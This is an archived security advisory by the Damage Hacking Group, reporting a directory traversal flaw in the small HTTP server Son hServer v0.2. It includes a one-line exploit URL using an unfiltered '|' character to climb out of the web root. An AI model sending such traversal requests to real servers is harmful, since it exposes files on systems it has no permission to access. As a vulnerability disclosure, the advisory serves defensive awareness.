Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: bt295.txt

Son hServer v0.2: directory traversal





-----BEGIN PGP SIGNED MESSAGE-----

################################################################
#                     _____   __   __  ___                     #
#             ........\    \.|  |.|  |/   \........            #
#             :       /     \|  | |  |   __>      :            #
#             :      /   _   \  |_|  |  / __      :            #
#             :     /    /    \      | <_/  \     :            #
#             :..../   _/     /  _   |   `   \....:            #
#                : \_________/__| |__|_______/ :               #
#                :   Damage   Hacking   Group  :               #
#                :      Security  Advisory     :               #
#                :.............................:               #
#                                                              #
#                     http://www.dhgroup.org                   #
#b                                                            d#
##b,________________________________________________________.d##
|                                                              |
  Product: Son hServer v0.2
  Authors: super-m.narod.ru
| Vulnerability: directory traversal                           |
#--------------------------------------------------------------#
| Overview:                                                    |
  ~~~~~~~~~

  Small russian http server 
|                                                              |
#--------------------------------------------------------------#
| Problem:                                                     |
  ~~~~~~~~

  This server doesn't filter the "|" (slash) symbol.
|                                                              |
#--------------------------------------------------------------#
| Exploit:                                                     |
  ~~~~~~~~

  Type in your browser: "http://[server]/.|./" and enjoy ;)
|                                                              |
#--------------------------------------------------------------#
| :wow:                                                        |
  www.dhgroup.org -=> opened English version! Come on in :)
   ~~~
   NeKr0 /DHG                                 www.dhgroup.org
|                                                              |
#______________________________________________________________#
 \___________________________da_end___________________________/
 

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPtaTcm4LIpseSJmPAQGULAP8Cwy21KIFzkUd+OxQBkO8cReTtn2xLo/k
r/N6wSvMCXk3LKqrLAh+pdHXt76rqX9zI5z2nwrV8P05S4DYtlFSGPDMiCFEyQ/u
LZwRs6HiuF3A0DBph9AXAJEfNZfUsX9M619kLk1RTK22T0GqcsPG+fZCh8RBdCBp
/zIvGD+T5gc=
=it5C
-----END PGP SIGNATURE-----


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH